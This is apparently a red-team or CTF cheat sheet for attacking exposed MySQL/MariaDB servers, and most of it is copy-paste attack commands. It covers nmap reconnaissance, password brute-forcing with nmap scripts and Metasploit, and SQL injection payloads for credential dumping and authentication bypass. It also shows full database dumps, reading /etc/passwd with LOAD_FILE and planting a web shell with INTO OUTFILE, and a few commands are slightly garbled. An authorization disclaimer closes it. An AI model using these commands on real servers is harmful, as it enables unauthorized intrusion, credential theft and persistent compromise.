0) What is MySQL / MariaDB?
MySQL and MariaDB are widely-used relational database servers that typically listen on TCP port 3306. They store application data, credentials, configuration, and sometimes secrets. In assessments and red-team competitions, an exposed database server (remote access to port 3306) is high-value: weak credentials, misconfigurations, or excessive privileges (e.g., FILE) let you dump data, read server files, or write web shells.
1) Recon Phase
- Service discovery: nmap -sV -p 3306 <target>
- Banner grab & version: nmap -sV -p 3306 --script=mysql-info <target>
- Check reachability from your network (telnet <target> 3306 or nc -vz)
- Identify hosts running MySQL vs MariaDB via banner and fingerprinting
Note version strings (important for known CVEs) and whether the server accepts remote connections. Record any hostnames or service names returned in banners.
2) Enumeration Phase
- Attempt anonymous/null auth (rare): mysql -h <target> -u '' -e "SHOW DATABASES;"
- Test common creds / defaults: mysql -h <target> -u root -p (try default/root passwords)
- Use targeted scanners:
nmap --script=mysql-brute,mysql-info -p 3306 <target>
msfconsole: auxiliary/scanner/mysql/mysql_login
- Enumerate users & privileges (when authenticated):
SELECT User, Host FROM mysql.user;
SHOW GRANTS FOR 'user'@'host';
- Check for users with FILE privilege (allows server-side file read/write)
SELECT * FROM mysql.user WHERE File_priv='Y' OR Super_priv='Y';
- Discover databases/tables when authenticated:
SHOW DATABASES;
USE ; SHOW TABLES;
"SELECT COUNT(*) FROM table> LIMIT 1";
Prioritize finding credentials, users with elevated privileges, and evidence of stored secrets (config tables, api_keys, password reset tokens).
SQL Injection
In-Band SQL Ex: 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '
') FROM staff_users
Blind SQL- Authentication Bypass Ex: ' OR 1=1;--
Blind SQL- Boolean Based Ex: admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
MySQL / MariaDB Info — What to Look For
- Default or weak credentials (root/root, root with no password)
- Accounts with excessive privileges (FILE, SUPER, PROCESS)
- Plaintext credentials stored in config tables or application DB
- secure_file_priv unset or set to a writable directory
- Remote access allowed from internet (bind-address 0.0.0.0)
- Old versions with known exploits or misconfigurations
Tools Required
sudo apt install nmap mysql-client mariadb-client mysql-server
# pentest tools
sudo apt install hydra sqlmap metasploit-framework
# utilities
mysqldump mysqlshow mysqladmin
Quick copy-paste command cheatsheet
# discovery & banner nmap -sV -p 3306 --script=mysql-info,mysql-config <target> # test connectivity nc -vz <target> 3306 telnet <target> 3306 # try login (interactive) mysql -h <target> -u root -p # automated brute (authorized only) nmap --script mysql-brute -p 3306 --script-args userdb=users.txt,passdb=pass.txt <target> msfconsole -q -x "use auxiliary/scanner/mysql/mysql_login; set RHOSTS <target>; set USERNAME root; set PASSWORD 1234; run; exit" # once authenticated: list databases/tables SHOW DATABASES; USE; SHOW TABLES; # dump databases (authenticated) mysqldump -h <target> -u user -p'password' --databases > db.sql # check FILE privileges / secure_file_priv SELECT User, Host, File_priv, Super_priv FROM mysql.user; SELECT @@global.secure_file_priv; # attempt to read file (if allowed) SELECT LOAD_FILE('/etc/passwd'); # write webshell (if permitted by secure_file_priv and webroot path) SELECT '' INTO OUTFILE '/var/www/html/shell.php';
Citations
- MySQL Reference Manual
- MariaDB Knowledge Base
- Nmap NSE — mysql-info / mysql-brute
- sqlmap — automated SQL injection (useful when DB accessible via web app)
Disclaimer: Use these techniques only on systems you own, in contained labs, or where you have explicit authorization (CTF / engagement rules). Actions such as writing files, UDF upload, or changing database state can be disruptive—treat them as last-resort, score-hungry moves and follow the rules of engagement.